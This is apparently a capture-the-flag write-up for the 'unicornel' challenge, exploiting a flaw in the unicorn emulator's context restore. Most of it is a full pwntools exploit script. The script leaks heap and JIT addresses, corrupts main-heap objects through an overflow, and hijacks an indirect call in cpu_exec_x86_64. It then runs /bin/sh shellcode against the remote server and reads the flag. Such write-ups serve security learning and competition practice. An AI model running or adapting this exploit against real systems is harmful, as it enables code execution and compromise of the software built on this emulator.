The most attractive candidate is the emulated system call interface.



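Within the unicorn engine code reached through the system call interface, I found that uc_context_restore becomes exploitable once the context object is corrupted.

The copy length is determined dynamically when the context is saved.

Here, a1 + 384 is a unicorn engine object allocated on the main heap.

a2, however, lives on the thread heap where the vulnerability occurs, as you can see.

That widens the attack surface.

Simply by tampering with an object in the thread heap, we can trigger an overflow on the main heap and thereby corrupt main-heap objects.

cpu_exec_x86_64 calls a function pointer loaded through one of those objects, so by crafting the object to satisfy the right conditions I was able to hijack RIP.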
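The indirect call in cpu_exec_x86_64 is `mov rax, [rax + 0x2c0]` followed by `call [rax + 0x90]`, and the `target` / `target1` arithmetic in the exploit is chosen so that both loads land inside attacker-controlled memory. The sketch below checks that arithmetic on a toy memory model. It assumes `heap_leak` is the host address of the spot in the shared buffer where the exploit writes its fake pointers; the dict stands in for real memory, and the helper names are hypothetical.

```python
def build_fake_objects(heap_leak, jit_base):
    """Compute the pointers the exploit plants (offsets taken from the script)."""
    jump = jit_base + 0xDDB            # offset into the JIT page used by the exploit
    target1 = heap_leak - 0x90 + 0x10  # so [target1 + 0x90] reads heap_leak + 0x10
    target = heap_leak - 0x2C0 + 0x8   # so [target + 0x2c0] reads heap_leak + 0x8
    memory = {heap_leak + 0x8: target1, heap_leak + 0x10: jump}
    return target, memory, jump

def resolve_indirect_call(rax, memory):
    """Model `mov rax, [rax + 0x2c0]; call [rax + 0x90]` on the toy memory."""
    rax = memory[rax + 0x2C0]
    return memory[rax + 0x90]

# Made-up addresses, only to check that the chain resolves to the JIT gadget.
target, memory, jump = build_fake_objects(0x7F0000100000, 0x7F2000000000)
print(hex(resolve_indirect_call(target, memory)))
```

Overwriting the engine's object pointer with `target` is therefore enough to steer the call to `jump`, where the planted shellcode chunks are waiting.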

Exploit code

from pwn import *

from keystone import *

import os

UC_ARCH_ARM = 1

UC_ARCH_ARM64 = 2

UC_ARCH_MIPS = 3

UC_ARCH_X86 = 4

UC_ARCH_PPC = 5

UC_ARCH_SPARC = 6

UC_ARCH_M68K = 7

UC_ARCH_RISCV = 8

UC_ARCH_S390X = 9

UC_ARCH_TRICORE = 10

UC_ARCH_MAX = 11

UC_MODE_16 = 1 << 1

UC_MODE_32 = 1 << 2

UC_MODE_64 = 1 << 3

UC_MODE_ARM = 0

UC_MODE_BIG_ENDIAN = 1 << 30

def asm_x86_64(assembly_code):

ks = Ks(KS_ARCH_X86, KS_MODE_64)

encoding, count = ks.asm(assembly_code)

return b''.join(bytes([b]) for b in encoding)

def asm_aarch64(assembly_code):

ks = Ks(KS_ARCH_ARM64, KS_MODE_LITTLE_ENDIAN)

encoding, count = ks.asm(assembly_code)

return b''.join(bytes([b]) for b in encoding)

def asm_arm(assembly_code):

ks = Ks(KS_ARCH_ARM, KS_MODE_ARM)

encoding, count = ks.asm(assembly_code)

return b''.join(bytes([b]) for b in encoding)

def SEND_ELF(ARCH, MODE, code_length):

payload = b''

payload += p32(ARCH)

payload += p32(MODE)

payload += p64(0x1000) + p64(0x1000)

payload += p64(0x2000) + p64(0x1000)

payload += p64(0x3000) + p64(0x1000)

payload += p64(0x4000) + p64(0x1000)

payload += p16(code_length)

payload += p8(4)

payload += p8(0) * 5

p.send(payload)

unicornel_exit = 0

unicornel_write = 1

print_integer = 2

create_shared = 3

map_shared = 4

unmap_shared = 5

bookmark = 6

unicornel_rewind = 7

switch_arch = 8

unicornel_pause = 9

unicornel_resume = 10

def write_x86(addr, count):

payload = f'''\

mov rax, {unicornel_write}

mov rbx, {addr}

mov rcx, {count}

int 0x80

'''

return payload

def print_str_x86(string):

payload = shellcraft.pushstr(string) + f'''\

mov rax, {unicornel_write}

mov rbx, rsp

mov rcx, {len(string)}

int 0x80

'''

return payload

def pause_x86():

payload = f'''\

mov rax, {unicornel_pause}

int 0x80

'''

return payload

def print_return_value_x86():

payload = f'''\

mov rbx, rax

mov rax, {print_integer}

int 0x80

'''

return payload

def create_shared_x86(length):

payload = f'''\

mov rax, {create_shared}

mov rbx, {length}

int 0x80

'''

return payload

def map_shared_x86(address, length, handle):

payload = f'''\

mov rax, {map_shared}

mov rbx, {address}

mov rcx, {length}

mov rdx, {handle}

int 0x80

'''

return payload

def unmap_shared_x86():

payload = f'''\

mov rax, {unmap_shared}

int 0x80

'''

return payload

def resume_x86(pid):

payload = f'''\

mov rbx, {pid}

mov rax, {unicornel_resume}

int 0x80

'''

return payload

def rewind_x86():

payload = f'''

mov rax, {unicornel_rewind}

int 0x80

'''

return payload

def save_ctx_x86():

payload = f'''

mov rax, {bookmark}

int 0x80

'''

return payload

def pause_aarch64():

payload = f'''

mov x0, #{unicornel_pause}

svc 0

'''

return payload

def resume_aarch64(pid):

payload = f'''

mov x1, #{pid}

mov x0, #{unicornel_resume}

svc 0

'''

return payload

def save_ctx_aarch64():

payload = f'''

mov x0, #{bookmark}

svc 0

'''

return payload

def map_shared_aarch64(address, length, handle):

payload = f'''

mov x0, #{map_shared}

mov x1, #{address}

mov x2, #{length}

mov x3, #{handle}

svc 0

'''

return payload

def print_return_value_aarch64():

payload = f'''

mov x1, x0

mov x0, #{print_integer}

svc 0

'''

return payload

def rewind_aarch64():

payload = f'''

mov x0, #{unicornel_rewind}

svc 0

'''

return payload

def pause_arm():

payload = f'''

mov r0, #{unicornel_pause}

svc 0

'''

return payload

def rewind_arm():

payload = f'''

mov r0, #{unicornel_rewind}

svc 0

'''

return payload

def print_return_value_arm():

payload = f'''

mov r1, r0

mov r0, {print_integer}

svc 0

'''

return payload

def save_ctx_arm():

payload = f'''

mov r0, #{bookmark}

svc 0

'''

return payload

def resume_arm(pid):

payload = f'''

mov r0, #{unicornel_resume}

mov r1, #{pid}

svc 0

'''

return payload

def map_shared_arm(address, length, handle):

payload = f'''

mov r0, #{map_shared}

mov r1, #{address}

mov r2, #{length}

mov r3, #{handle}

svc 0

'''

return payload

it = 0 # attempt counter, incremented at the end of every retry

while True:

REMOTE = True

if REMOTE:

p = remote('unicornel.2024.ctfcompetition.com', 1337)

p.recvuntil(b'You can run the solver with:\n')

cmd = "bash -c '" + (p.recvline()[4:]).decode() + "'"

result = (os.popen(cmd).read())

p.sendline(result.split ()[0])

log.success("POW finished")

else:

p = process('./chal')

context.binary = ELF('./chal')

# pid 0

code = ''

code += 'mov sp, #0x2000\n'

code += save_ctx_aarch64()

code += pause_aarch64()

code += map_shared_aarch64(0x5000, 0x5000, 0)

code += resume_aarch64(1)

code += rewind_aarch64()

payload = asm_aarch64(code)

SEND_ELF(UC_ARCH_ARM64, UC_MODE_ARM, len(payload))

p.send(payload)

p.recvuntil(b'with pid ')

pid = int(p.recvline()[:-1])

log.success(f"created process - {pid}")

# pid 1

code = ''

code += 'mov rsp, 0x2000\n'

code += 'retry:\n'

code += create_shared_x86(0x000000000005000)

code += resume_x86(0)

code += pause_x86()

code += map_shared_x86(0x5000, 0x5000, 0) # handle 0

code += '''\

mov rdi, 0x5000

mov rax, [rdi]

cmp rax, 0

jne success

'''

code += unmap_shared_x86()

code += 'jmp retry\n'

code += 'success:\n'

code += write_x86(0x5000, 0x40)

code += write_x86(0x5000, 0x10)

code += pause_x86() # exploit phase 2 aaw

code += 'jmp 0x7000\n' # shared memory - shellcode start

# maybe RVA? 0x7000 not working

payload = asm_x86_64(code)

SEND_ELF(UC_ARCH_X86, UC_MODE_64, len(payload))

p.send(payload)

p.recvuntil(b'with pid ')

pid = int(p.recvline()[:-1])

log.success(f"created process - {pid}")

rv = p.recv(0x40)

leak = u64(rv[:8])

thread_heap = u64(rv[16:24])

log.success("thread heap: " + hex(thread_heap))

JIT = leak - 0x720

heap_leak = u64(rv[0x10:0x18]) + 0x1e820

if JIT < 0:

continue

log.success("JIT: "+hex(JIT))

log.success("heap target: "+hex(heap_leak))

rv = p.recv(0x10)

leak = u64(rv[:8])

if leak-0x720 != JIT: # leak + 0x720

continue

# pid 2

x86_code = write_x86(0x3000, 0x20)

# shellcode = []

# shellcode.append(u64(asm('''\

# push 0x68732f

# pop rax

# jmp $+0x8

# ''').ljust(8,b'\x00')))

# shellcode.append(u64(asm('''\

# push 0x6e69622f

# pop rdx

# jmp $+0x8

# ''').ljust(8,b'\x00')))

# shellcode.append(u64(asm('''\

# shl rax,0x20

# xor esi,esi

# jmp $+0x8

# ''').ljust(8,b'\x00')))

# shellcode.append(u64(asm('''\

# add rax,rdx

# xor edx,edx

# push rax

# jmp $+0x8

# ''').ljust(8,b'\x00')))

# shellcode.append(u64(asm('''\

# mov rdi,rsp

# push 0x3b

# pop rax

# syscall

# ''').ljust(8,b'\x00')))

shellcode = [498588942530195304, 498591614015516520, 498762874620002632, 498581047463641416, 364607107060173128]

print(shellcode)

x86_code += f'''\

movq r9, 0xcafebabecafebabe

movq r10, {hex(shellcode[0])}

movq r11, {hex(shellcode[1])}

movq r12, {hex(shellcode[2])}

movq r13, {hex(shellcode[3])}

movq r14, {hex(shellcode[4])}

'''

x86_code += save_ctx_x86()

x86_code += resume_x86(2) # go

x86_code += pause_x86()

x86_code += rewind_x86()

x86_payload = asm_x86_64(x86_code)

x86_payload = x86_payload.ljust((len(x86_code)//4 + 1)*4, b'\x00')

stub = 'mov r0, 0x8000\n'

for i in range(len(x86_code)//4):

stub += f'ldr r1, = {u32(x86_payload[4*i:4*i+4])}\n'

stub += f'str r1, [r0]\n'

stub += f'add r0, r0, #4\n'

code = ''

code += 'mov sp, #0x2000\n'

code += map_shared_arm(0x5000, 0x5000, 0)

code += print_return_value_arm()

code += stub

code += resume_arm(1)

code += pause_arm() # go target

target = heap_leak - 0x2c0 + 0x8

target1 = heap_leak - 0x90 + 0x10

jump = JIT + 0xddb

code += f'''\

ldr r1, = {0x3000}

ldr r0, = {0x5190}

str r1, [r0] // size overwrite

ldr r0, = {0x51a0 + 8}

ldr r1, = {target1 & 0xffffffff}

ldr r2, = {target1 >> 32}

str r1, [r0]

add r0, r0, #4

str r2, [r0]

ldr r0, = {0x51a0 + 0x10}

ldr r1, = {jump & 0xffffffff}

ldr r2, = {jump >> 32}

str r1, [r0]

add r0, r0, #4

str r2, [r0]

ldr r0, = {0x51a0 + 0x1b38}

ldr r1, = {target & 0xffffffff}

ldr r2, = {target >> 32}

str r1, [r0]

add r0, r0, #4

str r2, [r0]

'''

code += resume_arm(1)

'''

0x559c69a119a8 4c89ef <cpu_exec_x86_64+0x288> mov rdi, r13

-> 0x559c69a119ab 488b80c0020000 <cpu_exec_x86_64+0x28b> mov rax, QWORD PTR [rax + 0x2c0]

0x559c69a119b2 ff9090000000 <cpu_exec_x86_64+0x292> call QWORD PTR [rax + 0x90]

0x559c69a119b8 4989c4 <cpu_exec_x86_64+0x298> mov r12, rax

0x559c69a119bb 488b83a8810000 <cpu_exec_x86_64+0x29b> mov rax, QWORD PTR [rbx + 0x81a8]

0x559c69a119c2 4d89e7 <cpu_exec_x86_64+0x2a2> mov r15, r12

'''

payload = asm_arm(code)

SEND_ELF(UC_ARCH_ARM, UC_MODE_ARM, len(payload))

pause()

p.send(payload)

try:

p.recvuntil(b'with pid ')

pid = int(p.recvline()[:-1])

log.success(f"created process - {pid}")

sleep(1)

p.sendline(b'id')

p.sendline(b'id')

p.sendline(b'cat flag*')

if b'uid' in p.recvuntil(b'uid', timeout=2):

p.interactive()

break

except Exception as e:

print(e)

pass

it += 1

p.close()